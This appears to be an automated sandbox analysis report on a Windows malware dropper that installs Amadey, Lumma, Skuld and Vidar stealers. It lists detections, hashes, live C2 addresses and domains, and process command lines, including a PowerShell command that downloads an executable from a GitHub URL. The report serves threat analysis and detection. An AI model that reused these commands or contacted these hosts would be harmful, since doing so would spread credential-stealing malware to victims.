File name:

2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer

Full analysis: https://app.any.run/tasks/7d24b9cb-0eae-4e69-a33d-f7a4d2f82c58
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 13:48:50
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
amadey
botnet
stealer
auto
rdp
auto-sch
skuld
lumma
themida
github
telegram
vidar
stealc
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

F44CA647CBC2EC8C30E0D56170A67672

SHA1:

82F15E07B71FA0848DE860EEF0AAB8F978CB1E0B

SHA256:

D7478FFA0CEDDD28F3168296C16AC97E0B8B88D847CD7A8F9A24497E24FB5ECC

SSDEEP:

49152:3PPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtf3Xx:/P/mp7t3T4+B/btosJwIA4hHmZlKH2TZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7344)

    • AMADEY has been found (auto)

      • powershell.exe (PID: 7536)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7536)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7536)

    • AMADEY has been detected (SURICATA)

      • saved.exe (PID: 7820)

    • Connects to the CnC server

      • saved.exe (PID: 7820)
      • svchost.exe (PID: 2196)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7536)

    • AMADEY has been detected (YARA)

      • saved.exe (PID: 7820)

    • SKULD has been detected

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)

    • LUMMA mutex has been found

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)

    • Steals credentials from Web Browsers

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)

    • Actions looks like stealing of personal data

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)

    • LUMMA has been detected (YARA)

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)

    • Adds path to the Windows Defender exclusion list

      • jYKC9dZ.exe (PID: 7952)
      • cmd.exe (PID: 3240)
      • jYKC9dZ.exe (PID: 5204)
      • cmd.exe (PID: 2340)

    • Changes Windows Defender settings

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)

    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5172)

    • VIDAR mutex has been found

      • MSBuild.exe (PID: 7520)

    • Stealers network behavior

      • svchost.exe (PID: 2196)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 5204)
      • JSEVGJV.exe (PID: 7636)

    • Probably download files using WebClient

      • mshta.exe (PID: 7364)

    • Connects to the server without a host name

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7536)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • powershell.exe (PID: 6960)
      • powershell.exe (PID: 6560)
      • cmd.exe (PID: 7220)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)

    • Reads security settings of Internet Explorer

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • MSBuild.exe (PID: 7520)

    • Starts itself from another location

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)

    • Found IP address in command line

      • powershell.exe (PID: 7536)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7364)
      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)
      • cmd.exe (PID: 924)
      • cmd.exe (PID: 6944)

    • Manipulates environment variables

      • powershell.exe (PID: 7536)

    • Starts process via Powershell

      • powershell.exe (PID: 7536)

    • Contacting a server suspected of hosting an CnC

      • saved.exe (PID: 7820)
      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5172)

    • There is functionality for taking screenshot (YARA)

      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 3884)

    • There is functionality for enable RDP (YARA)

      • saved.exe (PID: 7820)

    • Uses TASKKILL.EXE to kill Browsers

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)

    • Uses TASKKILL.EXE to kill process

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)

    • Reads the BIOS version

      • 2e92a12cfe.exe (PID: 7772)

    • Process drops legitimate windows executable

      • saved.exe (PID: 7820)

    • Starts a Microsoft application from unusual location

      • 1xtPr6S.exe (PID: 3132)
      • VisualCode.exe (PID: 7552)
      • 47Q6wZM.exe (PID: 7704)
      • AJ2naPd.exe (PID: 6828)
      • 1xtPr6S.exe (PID: 7800)

    • Searches for installed software

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • qpzfu.exe (PID: 7316)
      • randrof.exe (PID: 5588)

    • Application launched itself

      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)

    • Reads the date of Windows installation

      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3240)
      • cmd.exe (PID: 2340)

    • The process executes via Task Scheduler

      • saved.exe (PID: 2560)
      • saved.exe (PID: 7768)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 6960)
      • powershell.exe (PID: 6560)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 7520)

    • Hides command output

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 7220)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 7220)

    • Executes application which crashes

      • 8d9fc1ac2d.exe (PID: 2776)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2568)

    • Connects to unusual port

      • MSBuild.exe (PID: 7244)
      • svchost.exe (PID: 776)

  • INFO

    • Reads mouse settings

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)

    • Checks supported languages

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • AwFCMAP.exe (PID: 7192)
      • 2e92a12cfe.exe (PID: 7772)
      • 1xtPr6S.exe (PID: 3132)
      • MSBuild.exe (PID: 3884)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • saved.exe (PID: 2560)
      • AwFCMAP.exe (PID: 4212)
      • randrof.exe (PID: 5588)
      • VisualCode.exe (PID: 7552)
      • MSBuild.exe (PID: 7520)
      • zb7jDew.exe (PID: 7556)
      • qpzfu.exe (PID: 7316)

    • The sample compiled with english language support

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • saved.exe (PID: 7820)
      • cmd.exe (PID: 7220)

    • Reads the computer name

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 7952)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)
      • qpzfu.exe (PID: 7316)

    • Create files in a temporary directory

      • 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7320)
      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • AwFCMAP.exe (PID: 7192)

    • Auto-launch of the file from Task Scheduler

      • cmd.exe (PID: 7344)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7364)

    • Checks proxy server information

      • powershell.exe (PID: 7536)
      • saved.exe (PID: 7820)
      • powershell.exe (PID: 6560)
      • MSBuild.exe (PID: 7520)

    • Disables trace logs

      • powershell.exe (PID: 7536)
      • powershell.exe (PID: 6960)

    • The executable file from the user directory is run by the Powershell process

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)

    • Process checks computer location settings

      • TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXE (PID: 7756)
      • saved.exe (PID: 7820)
      • jYKC9dZ.exe (PID: 5744)
      • jYKC9dZ.exe (PID: 6264)
      • jYKC9dZ.exe (PID: 5204)

    • Creates files or folders in the user directory

      • saved.exe (PID: 7820)
      • MSBuild.exe (PID: 7520)

    • Drops encrypted JS script (Microsoft Script Encoder)

      • AwFCMAP.exe (PID: 7192)
      • AwFCMAP.exe (PID: 4212)

    • Reads the machine GUID from the registry

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)

    • Reads the software policy settings

      • 2e92a12cfe.exe (PID: 7772)
      • MSBuild.exe (PID: 3884)
      • randrof.exe (PID: 5588)
      • qpzfu.exe (PID: 7316)
      • zb7jDew.exe (PID: 7556)
      • MSBuild.exe (PID: 7520)

    • Themida protector has been detected

      • 2e92a12cfe.exe (PID: 7772)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 7144)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3888)
      • powershell.exe (PID: 7144)

    • Creates files in the program directory

      • MSBuild.exe (PID: 7520)

    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 7520)

    • Application launched itself

      • chrome.exe (PID: 4188)
      • msedge.exe (PID: 7432)

    • NirSoft software is detected

      • JSEVGJV.exe (PID: 7636)
      • DNS.exe (PID: 6184)

    • Manual execution by a user

      • svchost.exe (PID: 776)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(7820) saved.exe
C2185.39.17.163
URLhttp://185.39.17.163/Su8kud7i/index.php
Version5.34
Options
Drop directoryc13dbdc4fa
Drop namesaved.exe
Strings (125)S-%lu-
og:
clip.dll
ProgramData\
shell32.dll
<c>
vs:
Programs
&&
VideoID
ESET
av:
\App
0000043f
Doctor Web
:::
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
------
rundll32.exe
00000422
185.39.17.163
0123456789
st=s
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
msi
ar:
GetNativeSystemInfo
Norton
-%lu
Sophos
zip
SOFTWARE\Microsoft\Windows NT\CurrentVersion
" Content-Type: application/octet-stream
|
+++
" && ren
pc:
#
d1
cmd /C RMDIR /s/q
Bitdefender
Comodo
<d>
Kaspersky Lab
DefaultSettings.YResolution
Main
c13dbdc4fa
-executionpolicy remotesigned -File "
&& Exit"
ProductName
&unit=
2022
Panda Security
=
Rem
cmd
\0000
id:
sd:
--
/quiet
rundll32
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
%-lu
random
GET
"taskkill /f /im "
Content-Disposition: form-data; name="data"; filename="
00000423
5.34
2016
?scr=1
ComputerName
Keyboard Layout\Preload
Powershell.exe
POST
http://
AVAST Software
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
ps1
DefaultSettings.XResolution
Startup
CurrentBuild
e3
cred.dll|clip.dll|
------
WinDefender
wb
https://
Avira
2025
" && timeout 1 && del
cred.dll
un:
SYSTEM\ControlSet001\Services\BasicDisplay\Video
rb
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
360TotalSecurity
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
saved.exe
e1
lv:
/Su8kud7i/index.php
shutdown -s -t 0
/k
e2
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
exe
%USERPROFILE%
-unicode-
r=
.jpg
dll
Content-Type: multipart/form-data; boundary=----
2019
bi:
\
"
kernel32.dll
os:
abcdefghijklmnopqrstuvwxyz0123456789-_
dm:
AVG

Lumma

(PID) Process(7772) 2e92a12cfe.exe
C2 (9)parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
blockhubr.live/jhgf
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
fishgh.digital/tequ
(PID) Process(3884) MSBuild.exe
C2 (9)parakehjet.run/kewk
buzzarddf.live/ktnt
zenithcorde.top/auid
bearjk.live/benj
techguidet.digital/apdo
techsyncq.run/riid
btcgeared.live/lbak
vecturar.top/zsia
fishgh.digital/tequ
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:04:29 11:46:44+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
275
Monitored processes
143
Malicious processes
21
Suspicious processes
6

Behavior graph

Click at the process to see the details
start 2025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs #AMADEY powershell.exe conhost.exe no specs #AMADEY tempt5yx6awvctr5cglrm2ify3mhnxbqoezx.exe #AMADEY saved.exe #SKULD awfcmap.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs #LUMMA 2e92a12cfe.exe 1xtpr6s.exe no specs #LUMMA msbuild.exe #LUMMA svchost.exe jykc9dz.exe no specs conhost.exe no specs jykc9dz.exe conhost.exe no specs slui.exe cmd.exe no specs powershell.exe no specs jykc9dz.exe no specs conhost.exe no specs jykc9dz.exe conhost.exe no specs saved.exe no specs cmd.exe no specs powershell.exe no specs #SKULD awfcmap.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs taskkill.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe #LUMMA randrof.exe #LUMMA qpzfu.exe #LUMMA zb7jdew.exe visualcode.exe no specs #VIDAR msbuild.exe jsevgjv.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe no specs conhost.exe no specs chrome.exe no specs ping.exe no specs chrome.exe no specs cmd.exe conhost.exe no specs ping.exe no specs chrome.exe no specs 8d9fc1ac2d.exe svchost.exe werfault.exe no specs saved.exe no specs reg.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs 47q6wzm.exe no specs msbuild.exe no specs #LUMMA msbuild.exe aj2napd.exe no specs ping.exe no specs msbuild.exe 48ddd987c2.exe 1xtpr6s.exe no specs msbuild.exe no specs msbuild.exe be4bde179c.exe dns.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
728taskkill /F /IM 7star.exeC:\Windows\System32\taskkill.exeAwFCMAP.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
776"C:\Windows\System32\svchost.exe"C:\Windows\SysWOW64\svchost.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
896\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
920"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe1xtPr6S.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
924C:\WINDOWS\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/grosesch/ibra/raw/refs/heads/main/chinainstal.exe' -OutFile 'C:\Users\admin\AppData\Local\lhtdguzdvdxr\randrof.exe'"C:\Windows\System32\cmd.exejYKC9dZ.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1240\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetaskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1272\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exetaskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1280taskkill /F /IM chrome.exeC:\Windows\System32\taskkill.exeAwFCMAP.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1324"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3232 --field-trial-handle=2284,i,16850591164830452302,792526355797790413,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
77 247
Read events
77 207
Write events
40
Delete events
0

Modification events

(PID) Process:(7364) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7364) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7364) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7536) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
34
Suspicious files
53
Text files
83
Unknown types
13

Dropped files

PID
Process
Filename
Type
7536powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:8FA51CC07DAB2A8F60F3A6BCF514FBA6
SHA256:93D95229B89E128A7FAF69EB5D5BC52F6B3876943ADBF1EDCFD66A62EE7B6182
73202025-04-29_f44ca647cbc2ec8c30e0d56170a67672_agent-tesla_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exeC:\Users\admin\AppData\Local\Temp\fY0UHIekF.htahtml
MD5:95B1958691E57BEA7C2F8E6E6E2A0E68
SHA256:D22E256651879766215E086E0E30879F5A3D6E234C6FC089A3FF6F5A8D4E1660
7536powershell.exeC:\Users\admin\AppData\Local\TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXEexecutable
MD5:F6C20A18AFEAC04964A6CCAD6BE59731
SHA256:CE75F9DEDE6D4E93549D35B816898113B6BEFAB9EF0AADF8949D4887C2C34BEA
7756TempT5YX6AWVCTR5CGLRM2IFY3MHNXBQOEZX.EXEC:\Windows\Tasks\saved.jobbinary
MD5:A5DC79463F28AEF80BA1B18F2ABE3E90
SHA256:CDC9114173DB68BB8BE3B34C0776B4A968EA7DBBC424F65E9F55D91426F6B6C4
7820saved.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\AwFCMAP[1].exeexecutable
MD5:14CE7C8943F4E123261C8E63E8E70039
SHA256:531472EDF392AAECF9CB3216F9DA57A1B1014AED275E5BF7683915F69C34AFD9
7536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sv0ruxit.htm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7192AwFCMAP.exeC:\Users\admin\AppData\Local\Temp\Red.zipcompressed
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
7820saved.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\random[1].exeexecutable
